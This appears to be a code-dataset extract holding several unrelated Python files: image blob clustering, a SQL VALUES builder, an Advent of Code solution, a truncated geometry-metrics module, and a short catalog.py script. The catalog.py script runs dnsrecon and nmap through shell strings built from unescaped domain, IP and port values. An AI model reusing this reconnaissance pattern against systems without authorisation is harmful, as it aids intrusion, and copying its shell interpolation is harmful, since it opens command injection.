| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5f302c5d8d693812839ea69e155909e598db642
| 19,149
|
py
|
Python
|
frame_2D_alg/alternative versions/intra_blob_xy.py
|
Mechachleopteryx/CogAlg
|
723104e1f57010e52f1dc249ba53ba58db0a991b
|
[
"MIT"
] | null | null | null |
frame_2D_alg/alternative versions/intra_blob_xy.py
|
Mechachleopteryx/CogAlg
|
723104e1f57010e52f1dc249ba53ba58db0a991b
|
[
"MIT"
] | null | null | null |
frame_2D_alg/alternative versions/intra_blob_xy.py
|
Mechachleopteryx/CogAlg
|
723104e1f57010e52f1dc249ba53ba58db0a991b
|
[
"MIT"
] | null | null | null |
'''
2D version of 1st-level algorithm is a combination of frame_blobs, intra_blob, and comp_P: optional raster-to-vector conversion.
intra_blob recursively evaluates each blob for two forks of extended internal cross-comparison and sub-clustering:
der+: incremental derivation cross-comp in high-variation edge areas of +vg: positive deviation of gradient triggers comp_g,
rng+: incremental range cross-comp in low-variation flat areas of +v--vg: positive deviation of negated -vg triggers comp_r.
Each adds a layer of sub_blobs per blob.
Please see diagram: https://github.com/boris-kz/CogAlg/blob/master/frame_2D_alg/Illustrations/intra_blob_2_fork_scheme.png
Blob structure, for all layers of blob hierarchy:
root_dert__,
Dert = I, iDy, iDx, G, Dy, Dx, M, S (area), Ly (vertical dimension)
# I: input, (iDy, iDx): angle of input gradient, G: gradient, (Dy, Dx): vertical and lateral Ds, M: match
sign,
box, # y0, yn, x0, xn
dert__, # box of derts, each = i, idy, idx, g, dy, dx, m
stack_[ stack_params, Py_ [(P_params, dert_)]]: refs down blob formation tree, in vertical (horizontal) order
# next fork:
fcr, # flag comp rng, also clustering criterion in dert and Dert: g in der+ fork, i+m in rng+ fork?
fig, # flag input is gradient
rdn, # redundancy to higher layers
rng, # comp range
sub_layers # [sub_blobs ]: list of layers across sub_blob derivation tree
# deeper layers are nested, multiple forks: no single set of fork params?
'''
from collections import deque, defaultdict
from class_cluster import ClusterStructure, NoneType
from class_bind import AdjBinder
from frame_blobs_yx import assign_adjacents
from intra_comp_g import comp_g, comp_r
from itertools import zip_longest
from class_stream import BlobStreamer
from utils import pairwise
import numpy as np
# from comp_P_draft import comp_P_blob
# filters, All *= rdn:
ave = 50 # fixed cost per dert, from average m, reflects blob definition cost, may be different for comp_a?
aveB = 50 # fixed cost per intra_blob comp and clustering
class CDeepP(ClusterStructure):
I = int
G = int
Dy = int
Dx = int
M = int
iDy = int
iDx = int
L = int
x0 = int
sign = NoneType
class CDeepStack(ClusterStructure):
I = int
G = int
Dy = int
Dx = int
M = int
iDy = int
iDx = int
S = int
Ly = int
y0 = int
Py_ = list
blob = object
down_connect_cnt = int
sign = NoneType
class CDeepBlob(ClusterStructure):
Dert = dict
box = list
stack_ = list
sign = NoneType
open_stacks = int
root_dert__ = object
dert__ = object
mask = object
adj_blobs = list
fopen = bool
margin = list
fcr = bool
fig = bool
rdn = float
rng = int
Ls = int # for visibility and next-fork rdn
sub_layers = list
# --------------------------------------------------------------------------------------------------------------
# functions, ALL WORK-IN-PROGRESS:
def intra_blob(blob, rdn, rng, fig, fcr, **kwargs): # recursive input rng+ | der+ cross-comp within blob
# fig: flag input is g | p, fcr: flag comp over rng+ | der+
if kwargs.get('render', None) is not None: # stop rendering sub-blobs when blob is too small
if blob.Dert['S'] < 100:
kwargs['render'] = False
spliced_layers = [] # to extend root_blob sub_layers
ext_dert__, ext_mask = extend_dert(blob)
if fcr:
dert__, mask = comp_r(ext_dert__, fig, fcr, ext_mask) # -> m sub_blobs
else:
dert__, mask = comp_g(ext_dert__, ext_mask) # -> g sub_blobs:
if dert__[0].shape[0] > 2 and dert__[0].shape[1] > 2 and False in mask: # min size in y and x, least one dert in dert__
sub_blobs = cluster_derts(dert__, mask, ave * rdn, fcr, fig, **kwargs)
# fork params:
blob.fcr = fcr
blob.fig = fig
blob.rdn = rdn
blob.rng = rng
blob.Ls = len(sub_blobs) # for visibility and next-fork rdn
blob.sub_layers = [sub_blobs] # 1st layer of sub_blobs
for sub_blob in sub_blobs: # evaluate for intra_blob comp_g | comp_r:
G = blob.Dert['G']; adj_G = blob.adj_blobs[2]
borrow = min(abs(G), abs(adj_G) / 2) # or adjacent M if negative sign?
if sub_blob.sign:
if sub_blob.Dert['M'] - borrow > aveB * rdn: # M - (intra_comp value lend to edge blob)
# comp_r fork:
blob.sub_layers += intra_blob(sub_blob, rdn + 1 + 1 / blob.Ls, rng * 2, fig=fig, fcr=1, **kwargs)
# else: comp_P_
elif sub_blob.Dert['G'] + borrow > aveB * rdn: # G + (intra_comp value borrow from flat blob)
# comp_g fork:
blob.sub_layers += intra_blob(sub_blob, rdn + 1 + 1 / blob.Ls, rng=rng, fig=1, fcr=0, **kwargs)
# else: comp_P_
spliced_layers = [spliced_layers + sub_layers for spliced_layers, sub_layers in
zip_longest(spliced_layers, blob.sub_layers, fillvalue=[])]
return spliced_layers
def cluster_derts(dert__, mask, Ave, fcr, fig, render=False): # similar to frame_to_blobs
if fcr: # comp_r output; form clustering criterion:
if fig:
crit__ = dert__[0] + dert__[6] - Ave # eval by i + m, accum in rng; dert__[:,:,0] if not transposed
else:
crit__ = Ave - dert__[3] # eval by -g, accum in rng
else: # comp_g output
crit__ = dert__[6] - Ave # comp_g output eval by m, or clustering is always by m?
root_dert__ = dert__ # derts after the comps operation, which is the root_dert__
dert__ = [*zip(*dert__)] # transpose dert__ into shape [y, params, x]
sub_blobs = [] # from form_blob:
stack_ = deque() # buffer of running vertical stacks of Ps
stack_binder = AdjBinder(CDeepStack)
if render:
streamer = BlobStreamer(CDeepBlob, crit__, mask)
if render:
streamer = BlobStreamer(CDeepBlob, crit__, mask)
for y, dert_ in enumerate(dert__): # in height, first and last row are discarded; print(f'Processing intra line {y}...')
# if False in mask[i]: # [y,x,params], there is at least one dert in line
P_binder = AdjBinder(CDeepP) # binder needs data about clusters of the same level
P_ = form_P_(zip(*dert_), crit__[y], mask[y], P_binder) # horizontal clustering, adds a row of Ps
if render:
render = streamer.update_blob_conversion(y, P_) # if return False, stop rendering
P_ = scan_P_(P_, stack_, root_dert__, sub_blobs, P_binder) # vertical clustering, adds up_connects per P and down_connect_cnt per stack
stack_ = form_stack_(P_, root_dert__, sub_blobs, y)
stack_binder.bind_from_lower(P_binder)
while stack_: # frame ends, last-line stacks are merged into their blobs:
form_blob(stack_.popleft(), root_dert__, sub_blobs)
blob_binder = AdjBinder(CDeepBlob)
blob_binder.bind_from_lower(stack_binder)
assign_adjacents(blob_binder) # add adj_blobs to each blob
# sub_blobs = find_adjacent(sub_blobs)
if render: # rendering mode after blob conversion
streamer.end_blob_conversion(y)
return sub_blobs
# clustering functions:
# -------------------------------------------------------------------------------------------------------------------
def form_P_(dert_, crit_, mask_, binder): # segment dert__ into P__, in horizontal ) vertical order
P_ = deque() # row of Ps
sign_ = crit_ > 0
x0 = 0
try:
while mask_[x0]: # skip until not masked
next(dert_)
x0 += 1
except IndexError:
return P_ # the whole line is masked, return an empty P
I, iDy, iDx, G, Dy, Dx, M, L = *next(dert_), 1 # initialize P params
_sign = sign_[x0]
_mask = mask_[x0] # mask bit per dert
for x, (i, idy, idx, g, dy, dx, m) in enumerate(dert_, start=x0+1): # loop left to right in each row of derts
mask = mask_[x]
if ~mask: # current dert is not masked
sign = sign_[x]
if ~_mask and sign != _sign: # prior dert is not masked and sign changed
# pack P
P = CDeepP(I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, L=L,x0=x0, sign=_sign)
P_.append(P)
# initialize P params:
I, iDy, iDx, G, Dy, Dx, M, L, x0 = 0, 0, 0, 0, 0, 0, 0, 0, x
elif _mask:
I, iDy, iDx, G, Dy, Dx, M, L, x0 = 0, 0, 0, 0, 0, 0, 0, 0, x
# current dert is masked
elif ~_mask: # prior dert is not masked
# pack P
P = CDeepP(I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, L=L, x0=x0, sign=_sign)
P_.append(P)
# initialize P params: (redundant)
# I, iDy, iDx, G, Dy, Dx, M, L, x0 = 0, 0, 0, 0, 0, 0, 0, 0, x + 1
if ~mask: # accumulate P params:
I += i
iDy += idy
iDx += idx
G += g
Dy += dy
Dx += dx
M += m
L += 1
_sign = sign # prior sign
_mask = mask
if ~_mask: # terminate and pack last P in a row if prior dert is unmasked
P = CDeepP(I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, L=L, x0=x0, sign=_sign)
P_.append(P)
for _P, P in pairwise(P_):
if _P.x0 + _P.L == P.x0: # check if Ps are adjacents
binder.bind(_P, P)
return P_
def scan_P_(P_, stack_, root_dert__, sub_blobs, binder): # merge P into higher-row stack of Ps with same sign and x_coord overlap
next_P_ = deque() # to recycle P + up_connect_ that finished scanning _P, will be converted into next_stack_
if P_ and stack_: # if both input row and higher row have any Ps / _Ps left
P = P_.popleft() # load left-most (lowest-x) input-row P
stack = stack_.popleft() # higher-row stacks
_P = stack.Py_[-1] # last element of each stack is higher-row P
up_connect_ = [] # list of same-sign x-overlapping _Ps per P
while True: # while both P_ and stack_ are not empty
x0 = P.x0 # first x in P
xn = x0 + P.L # first x beyond P
_x0 = _P.x0 # first x in _P
_xn = _x0 + _P.L # first x beyond _P
if stack.G > 0: # check for overlaps in 8 directions, else a blob may leak through its external blob
if _x0 - 1 < xn and x0 < _xn + 1: # x overlap between loaded P and _P
if P.sign == stack.sign: # sign match
stack.down_connect_cnt += 1
up_connect_.append(stack) # buffer P-connected higher-row stacks into P' up_connect_
else:
binder.bind(_P, P)
else: # -G, check for orthogonal overlaps only: 4 directions, edge blobs are more selective
if _x0 < xn and x0 < _xn: # x overlap between loaded P and _P
if P.sign == stack.sign: # sign match
stack.down_connect_cnt += 1
up_connect_.append(stack) # buffer P-connected higher-row stacks into P' up_connect_
else:
binder.bind(_P, P)
if (xn < _xn or # _P overlaps next P in P_
xn == _xn and stack.sign): # sign taken accounted
next_P_.append((P, up_connect_)) # recycle _P for the next run of scan_P_
up_connect_ = []
if P_:
P = P_.popleft() # load next P
else: # terminate loop
if stack.down_connect_cnt != 1: # terminate stack, merge it into up_connects' blobs
form_blob(stack, root_dert__, sub_blobs)
break
else: # no next-P overlap
if stack.down_connect_cnt != 1: # terminate stack, merge it into up_connects' blobs
form_blob(stack, root_dert__, sub_blobs)
if stack_: # load stack with next _P
stack = stack_.popleft()
_P = stack.Py_[-1]
else: # no stack left: terminate loop
next_P_.append((P, up_connect_))
break
while P_: # terminate Ps and stacks that continue at row's end
next_P_.append((P_.popleft(), [])) # no up_connect
while stack_:
form_blob(stack_.popleft(), root_dert__, sub_blobs) # down_connect_cnt always == 0
return next_P_ # each element is P + up_connect_ refs
def form_stack_(P_, root_dert__, sub_blobs, y): # Convert or merge every P into its stack of Ps, merge blobs
next_stack_ = deque() # converted to stack_ in the next run of scan_P_
while P_:
P, up_connect_ = P_.popleft()
I, G, Dy, Dx, M, iDy, iDx, L, x0, s = P.unpack()
xn = x0 + L # next-P x0
if not up_connect_:
# initialize new stack for each input-row P that has no connections in higher row:
blob = CDeepBlob(Dert=dict(I=0, G=0, Dy=0, Dx=0, M=0, iDy=0, iDx=0, S=0, Ly=0),
box=[y, x0, xn], stack_=[], sign=s, open_stacks=1)
new_stack = CDeepStack(I=I, G=G, Dy=0, Dx=Dx, M=M, iDy=iDy, iDx=iDx, S=L, Ly=1,
y0=y, Py_=[P], blob=blob, down_connect_cnt=0, sign=s)
new_stack.hid = blob.id
blob.stack_.append(new_stack)
else:
if len(up_connect_) == 1 and up_connect_[0].down_connect_cnt == 1:
# P has one up_connect and that up_connect has one down_connect=P: merge P into up_connect stack:
new_stack = up_connect_[0]
new_stack.accumulate(I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, S=L, Ly=1)
new_stack.Py_.append(P) # Py_: vertical buffer of Ps
new_stack.down_connect_cnt = 0 # reset down_connect_cnt
blob = new_stack.blob
else: # if > 1 up_connects, or 1 up_connect that has > 1 down_connect_cnt:
blob = up_connect_[0].blob
# initialize new_stack with up_connect blob:
new_stack = CDeepStack(I=I, G=G, Dy=0, Dx=Dx, M=M, iDy=iDy, iDx=iDx, S=L, Ly=1,
y0=y, Py_=[P], blob=blob, down_connect_cnt=0, sign=s)
new_stack.hid = blob.id
blob.stack_.append(new_stack)
if len(up_connect_) > 1: # merge blobs of all up_connects
if up_connect_[0].down_connect_cnt == 1: # up_connect is not terminated
form_blob(up_connect_[0], root_dert__, sub_blobs) # merge stack of 1st up_connect into its blob
for up_connect in up_connect_[1:len(up_connect_)]: # merge blobs of other up_connects into blob of 1st up_connect
if up_connect.down_connect_cnt == 1:
form_blob(up_connect, root_dert__, sub_blobs)
if not up_connect.blob is blob:
merged_blob = up_connect.blob
I, G, Dy, Dx, M, iDy, iDx, S, Ly = merged_blob.Dert.values()
accum_Dert(blob.Dert, I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, S=S, Ly=Ly)
blob.open_stacks += merged_blob.open_stacks
blob.box[0] = min(blob.box[0], merged_blob.box[0]) # extend box y0
blob.box[1] = min(blob.box[1], merged_blob.box[1]) # extend box x0
blob.box[2] = max(blob.box[2], merged_blob.box[2]) # extend box xn
for stack in merged_blob.stack_:
if not stack is up_connect:
stack.blob = blob # blobs in other up_connects are references to blob in the first up_connect.
stack.hid = blob.id
blob.stack_.append(stack) # buffer of merged root stacks.
up_connect.blob = blob
up_connect.hid = blob.id
blob.stack_.append(up_connect)
blob.open_stacks -= 1 # overlap with merged blob.
blob.box[1] = min(blob.box[1], x0) # extend box x0
blob.box[2] = max(blob.box[2], xn) # extend box xn
P.hid = new_stack.id # assign higher cluster id for P
next_stack_.append(new_stack)
return next_stack_
def form_blob(stack, root_dert__, sub_blobs): # increment blob with terminated stack, check for blob termination
I, G, Dy, Dx, M, iDy, iDx, S, Ly, y0, Py_, blob, down_connect_cnt, sign = stack.unpack()
accum_Dert(blob.Dert, I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, S=S, Ly=Ly)
# terminated stack is merged into continued or initialized blob (all connected stacks):
blob.open_stacks += down_connect_cnt - 1 # incomplete stack cnt + terminated stack down_connect_cnt - 1: stack itself
# open stacks contain Ps of a current row and may be extended with new x-overlapping Ps in next run of scan_P_
if blob.open_stacks == 0: # if number of incomplete stacks == 0
# blob is terminated and packed in blob root:
last_stack = stack
y0, x0, xn = blob.box
yn = last_stack.y0 + last_stack.Ly
mask = np.ones((yn - y0, xn - x0), dtype=bool) # mask box, then unmask Ps:
for stack in blob.stack_:
for y, P in enumerate(stack.Py_, start=stack.y0 - y0):
x_start = P.x0 - x0
x_stop = x_start + P.L
mask[y, x_start:x_stop] = False
fopen = 0 # flag: blob on frame boundary
if x0 == 0 or xn == root_dert__[0].shape[1] or y0 == 0 or yn == root_dert__[0].shape[0]:
fopen = 1
blob.root_dert__ = root_dert__
blob.box = (y0, yn, x0, xn)
blob.dert__ = [derts[y0:yn, x0:xn] for derts in root_dert__]
blob.mask = mask
blob.adj_blobs = [[], 0, 0]
blob.fopen = fopen
sub_blobs.append(blob)
def extend_dert(blob): # extend dert borders (+1 dert to boundaries)
y0, yn, x0, xn = blob.box # extend dert box:
rY, rX = blob.root_dert__[0].shape # higher dert size
# determine pad size
y0e = max(0, y0 - 1)
yne = min(rY, yn + 1)
x0e = max(0, x0 - 1)
xne = min(rX, xn + 1) # e is for extended
# take ext_dert__ from part of root_dert__
ext_dert__ = [derts[y0e:yne, x0e:xne] if derts is not None else None
for derts in blob.root_dert__]
# pad mask: top, btm, left, right. 1 or 0 at boundaries
mask = np.pad(blob.mask, ((y0 - y0e, yne - yn), (x0 - x0e, xne - xn)),
mode='constant', constant_values=True)
return ext_dert__, mask
def accum_Dert(Dert: dict, **params) -> None:
Dert.update({param: Dert[param] + value for param, value in params.items()})
| 44.740654
| 144
| 0.576584
| 2,827
| 19,149
| 3.700035
| 0.140785
| 0.034417
| 0.024092
| 0.005736
| 0.225621
| 0.205736
| 0.190153
| 0.16262
| 0.142925
| 0.139866
| 0
| 0.016623
| 0.318293
| 19,149
| 428
| 145
| 44.740654
| 0.784664
| 0.353804
| 0
| 0.293729
| 0
| 0
| 0.001977
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026403
| false
| 0
| 0.029703
| 0
| 0.224422
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5f35dd267171d89db5d5ed7c57d46dbcf723ae2
| 2,502
|
py
|
Python
|
polecat/db/sql/expression/values.py
|
furious-luke/polecat
|
7be5110f76dc42b15c922c1bb7d49220e916246d
|
[
"MIT"
] | 4
|
2019-08-10T12:56:12.000Z
|
2020-01-21T09:51:20.000Z
|
polecat/db/sql/expression/values.py
|
furious-luke/polecat
|
7be5110f76dc42b15c922c1bb7d49220e916246d
|
[
"MIT"
] | 71
|
2019-04-09T05:39:21.000Z
|
2020-05-16T23:09:24.000Z
|
polecat/db/sql/expression/values.py
|
furious-luke/polecat
|
7be5110f76dc42b15c922c1bb7d49220e916246d
|
[
"MIT"
] | null | null | null |
from functools import partial
from polecat.db.query import query as query_module
from psycopg2.sql import SQL, Placeholder
from .expression import Expression
class Values(Expression):
def __init__(self, values, relation=None):
self.values = values
self.relation = relation
self.keyword = 'VALUES'
def to_sql(self):
if isinstance(self.values, query_module.Values):
get_values_sql = partial(
self.get_values_sql_from_values, self.values
)
else:
get_values_sql = partial(
self.get_values_sql_from_dict, self.values
)
return self.get_values_sql(get_values_sql)
def get_values_sql(self, get_values_sql):
values_sql, values_args = get_values_sql()
joined_sql = SQL(', ').join(
SQL('({})').format(
SQL(', ').join(row_sql)
)
for row_sql in values_sql
)
return SQL('%s {}' % self.keyword).format(joined_sql), values_args
def get_values_sql_from_values(self, values):
column_values_sql = []
column_values = ()
for row in values.iter_rows():
row_values_sql = []
for column_name, column_value in row:
value_sql, value = self.value_to_sql(column_value, column_name)
row_values_sql.append(value_sql)
column_values += value
column_values_sql.append(row_values_sql)
return column_values_sql, column_values
def get_values_sql_from_dict(self, values_dict):
column_values_sql = []
column_values = ()
for column_name, column_value in values_dict.items():
value_sql, value = self.value_to_sql(column_value, column_name)
column_values_sql.append(value_sql)
column_values += value
return (column_values_sql,), column_values
def value_to_sql(self, value, column_name=None):
if isinstance(value, Expression):
sql, args = value.to_sql()
return SQL('{}').format(sql), args
else:
if self.relation and column_name:
column = self.relation.get_column(column_name)
value = column.to_db_value(value)
return Placeholder(), (value,)
def iter_column_names(self):
if isinstance(self.values, dict):
return self.values.keys()
else:
return self.values.iter_column_names()
| 34.75
| 79
| 0.61311
| 304
| 2,502
| 4.713816
| 0.151316
| 0.138172
| 0.092114
| 0.044662
| 0.406141
| 0.36776
| 0.291696
| 0.177251
| 0.121424
| 0.066992
| 0
| 0.00057
| 0.298961
| 2,502
| 71
| 80
| 35.239437
| 0.81642
| 0
| 0
| 0.213115
| 0
| 0
| 0.008393
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114754
| false
| 0
| 0.065574
| 0
| 0.327869
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5f3f84aa262b2485923b0060a6795013deae56c
| 1,292
|
py
|
Python
|
python/day3p1.py
|
swilcox/2019adventofcode
|
b67261aae74805ba8c2f4b72f09dd79277224ebb
|
[
"MIT"
] | 1
|
2020-01-18T18:24:18.000Z
|
2020-01-18T18:24:18.000Z
|
python/day3p1.py
|
swilcox/2019adventofcode
|
b67261aae74805ba8c2f4b72f09dd79277224ebb
|
[
"MIT"
] | null | null | null |
python/day3p1.py
|
swilcox/2019adventofcode
|
b67261aae74805ba8c2f4b72f09dd79277224ebb
|
[
"MIT"
] | null | null | null |
# 2019 advent day 3
MOVES = {
'R': (lambda x: (x[0], x[1] + 1)),
'L': (lambda x: (x[0], x[1] - 1)),
'U': (lambda x: (x[0] + 1, x[1])),
'D': (lambda x: (x[0] - 1, x[1])),
}
def build_route(directions: list) -> list:
current_location = (0, 0)
route = []
for d in directions:
direction, amount = d[0], int(d[1:])
for _ in range(amount):
current_location = MOVES[direction](current_location)
route.append(current_location)
return route
def find_intersections(r1: list, r2: list) -> set:
return set(r1).intersection(set(r2))
def find_shortest_manhattan_distance(points: set) -> int:
return min((abs(p[0]) + abs(p[1])) for p in points)
#R1 = 'R75,D30,R83,U83,L12,D49,R71,U7,L72'
#R2 = 'U62,R66,U55,R34,D71,R55,D58,R83'
#R1 = 'R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51'
#R2 = 'U98,R91,D20,R16,D67,R40,U7,R15,U6,R7'
def main():
#route1 = build_route(R1.split(','))
#route2 = build_route(R2.split(','))
with open('day3input.txt') as f:
line1, line2 = f.readlines()
route1 = build_route(line1.strip().split(','))
route2 = build_route(line2.strip().split(','))
print(find_shortest_manhattan_distance(find_intersections(route1, route2)))
if __name__ == "__main__":
main()
| 26.367347
| 79
| 0.600619
| 198
| 1,292
| 3.787879
| 0.464646
| 0.066667
| 0.042667
| 0.048
| 0.064
| 0.064
| 0.064
| 0
| 0
| 0
| 0
| 0.112512
| 0.202012
| 1,292
| 48
| 80
| 26.916667
| 0.614937
| 0.200464
| 0
| 0
| 0
| 0
| 0.026341
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.148148
| false
| 0
| 0
| 0.074074
| 0.259259
| 0.037037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5f42d830df55813fe6234674e4d597dccbd7f59
| 1,054
|
py
|
Python
|
examples/demo/python/catalog.py
|
JavDomGom/mist
|
83ae9f67df61ff2387a7d424cff0f8591a6a645f
|
[
"Apache-2.0"
] | 1
|
2021-04-23T17:13:31.000Z
|
2021-04-23T17:13:31.000Z
|
examples/demo/python/catalog.py
|
JavDomGom/mist
|
83ae9f67df61ff2387a7d424cff0f8591a6a645f
|
[
"Apache-2.0"
] | null | null | null |
examples/demo/python/catalog.py
|
JavDomGom/mist
|
83ae9f67df61ff2387a7d424cff0f8591a6a645f
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
async def searchDomains(domain, q):
domains = []
proc = await asyncio.create_subprocess_shell(f"dnsrecon -d {domain} -t crt", stdout=asyncio.subprocess.PIPE)
line = True
while line:
line = (await proc.stdout.readline()).decode('utf-8')
fields = line.split()
if len(fields)>1 and fields[1]=="A":
if q:
await q.put(fields[2])
domains.append(fields[2])
return domains
async def findOpenPorts(ip, ports, q):
openPorts = []
proc = await asyncio.create_subprocess_shell(f"nmap -p {ports} --open {ip}",stdout=asyncio.subprocess.PIPE)
line = True
while line:
line = (await proc.stdout.readline()).decode('utf-8')
fields = line.split()
if len(fields)>1 and fields[1]=="open":
openPort = fields[0].split("/")
if q:
await q.put({"ip": ip, "port": openPort[0], "protocol": openPort[1]})
openPorts.append({"port": openPort[0], "protocol": openPort[1]})
return openPorts
| 36.344828
| 112
| 0.588235
| 133
| 1,054
| 4.631579
| 0.368421
| 0.045455
| 0.051948
| 0.071429
| 0.642857
| 0.603896
| 0.506494
| 0.383117
| 0.383117
| 0.383117
| 0
| 0.016645
| 0.259013
| 1,054
| 28
| 113
| 37.642857
| 0.772087
| 0
| 0
| 0.384615
| 0
| 0
| 0.091082
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.038462
| 0
| 0.115385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5f5d714834d96889f873a0d7ec900fdf1926bca
| 21,522
|
py
|
Python
|
geomstats/geometry/riemannian_metric.py
|
stefanheyder/geomstats
|
c4e6d959db7b1bcc99b00b535b8aa5d832b62e28
|
[
"MIT"
] | null | null | null |
geomstats/geometry/riemannian_metric.py
|
stefanheyder/geomstats
|
c4e6d959db7b1bcc99b00b535b8aa5d832b62e28
|
[
"MIT"
] | null | null | null |
geomstats/geometry/riemannian_metric.py
|
stefanheyder/geomstats
|
c4e6d959db7b1bcc99b00b535b8aa5d832b62e28
|
[
"MIT"
] | null | null | null |
"""Riemannian and pseudo-Riemannian metrics."""
import math
import warnings
import autograd
import geomstats.backend as gs
from geomstats.geometry.connection import Connection
EPSILON = 1e-4
N_CENTERS = 10
TOLERANCE = 1e-5
N_REPETITIONS = 20
N_MAX_ITERATIONS = 50000
N_STEPS = 10
def loss(y_pred, y_true, metric):
"""Compute loss function between prediction and ground truth.
Loss function given by a Riemannian metric,
expressed as the squared geodesic distance between the prediction
and the ground truth.
Parameters
----------
y_pred
y_true
metric
Returns
-------
loss
"""
loss = metric.squared_dist(y_pred, y_true)
return loss
def grad(y_pred, y_true, metric):
"""Closed-form for the gradient of the loss function."""
tangent_vec = metric.log(base_point=y_pred, point=y_true)
grad_vec = - 2. * tangent_vec
inner_prod_mat = metric.inner_product_matrix(base_point=y_pred)
grad = gs.einsum('ni,nij->ni',
grad_vec,
gs.transpose(inner_prod_mat, axes=(0, 2, 1)))
return grad
class RiemannianMetric(Connection):
"""Class for Riemannian and pseudo-Riemannian metrics."""
def __init__(self, dimension, signature=None):
assert isinstance(dimension, int) or dimension == math.inf
assert dimension > 0
super().__init__(dimension=dimension)
self.signature = signature
def inner_product_matrix(self, base_point=None):
"""Inner product matrix at the tangent space at a base point.
Parameters
----------
base_point : array-like, shape=[n_samples, dimension], optional
"""
raise NotImplementedError(
'The computation of the inner product matrix'
' is not implemented.')
def inner_product_inverse_matrix(self, base_point=None):
"""Inner product matrix at the tangent space at a base point.
Parameters
----------
base_point : array-like, shape=[n_samples, dimension], optional
"""
metric_matrix = self.inner_product_matrix(base_point)
cometric_matrix = gs.linalg.inv(metric_matrix)
return cometric_matrix
def inner_product_derivative_matrix(self, base_point=None):
"""Compute derivative of the inner prod matrix at base point.
Parameters
----------
base_point : array-like, shape=[n_samples, dimension], optional
"""
metric_derivative = autograd.jacobian(self.inner_product_matrix)
return metric_derivative(base_point)
def christoffels(self, base_point):
"""Compute Christoffel symbols associated with the connection.
Parameters
----------
base_point: array-like, shape=[n_samples, dimension]
Returns
-------
christoffels: array-like,
shape=[n_samples, dimension, dimension, dimension]
"""
cometric_mat_at_point = self.inner_product_inverse_matrix(base_point)
metric_derivative_at_point = self.inner_product_derivative_matrix(
base_point)
term_1 = gs.einsum('nim,nmkl->nikl',
cometric_mat_at_point,
metric_derivative_at_point)
term_2 = gs.einsum('nim,nmlk->nilk',
cometric_mat_at_point,
metric_derivative_at_point)
term_3 = - gs.einsum('nim,nklm->nikl',
cometric_mat_at_point,
metric_derivative_at_point)
christoffels = 0.5 * (term_1 + term_2 + term_3)
return christoffels
def inner_product(self, tangent_vec_a, tangent_vec_b, base_point=None):
"""Inner product between two tangent vectors at a base point.
Parameters
----------
tangent_vec_a: array-like, shape=[n_samples, dimension]
or shape=[1, dimension]
tangent_vec_b: array-like, shape=[n_samples, dimension]
or shape=[1, dimension]
base_point: array-like, shape=[n_samples, dimension]
or shape=[1, dimension]
Returns
-------
inner_product : array-like, shape=[n_samples,]
"""
tangent_vec_a = gs.to_ndarray(tangent_vec_a, to_ndim=2)
tangent_vec_b = gs.to_ndarray(tangent_vec_b, to_ndim=2)
n_tangent_vec_a = gs.shape(tangent_vec_a)[0]
n_tangent_vec_b = gs.shape(tangent_vec_b)[0]
inner_prod_mat = self.inner_product_matrix(base_point)
inner_prod_mat = gs.to_ndarray(inner_prod_mat, to_ndim=3)
n_mats = gs.shape(inner_prod_mat)[0]
if n_tangent_vec_a != n_mats:
if n_tangent_vec_a == 1:
tangent_vec_a = gs.squeeze(tangent_vec_a, axis=0)
einsum_str_a = 'j,njk->nk'
elif n_mats == 1:
inner_prod_mat = gs.squeeze(inner_prod_mat, axis=0)
einsum_str_a = 'nj,jk->nk'
else:
raise ValueError('Shape mismatch for einsum.')
else:
einsum_str_a = 'nj,njk->nk'
aux = gs.einsum(einsum_str_a, tangent_vec_a, inner_prod_mat)
n_auxs, _ = gs.shape(aux)
if n_tangent_vec_b != n_auxs:
if n_auxs == 1:
aux = gs.squeeze(aux, axis=0)
einsum_str_b = 'k,nk->n'
elif n_tangent_vec_b == 1:
tangent_vec_b = gs.squeeze(tangent_vec_b, axis=0)
einsum_str_b = 'nk,k->n'
else:
raise ValueError('Shape mismatch for einsum.')
else:
einsum_str_b = 'nk,nk->n'
inner_prod = gs.einsum(einsum_str_b, aux, tangent_vec_b)
inner_prod = gs.to_ndarray(inner_prod, to_ndim=2, axis=1)
assert gs.ndim(inner_prod) == 2, inner_prod.shape
return inner_prod
def squared_norm(self, vector, base_point=None):
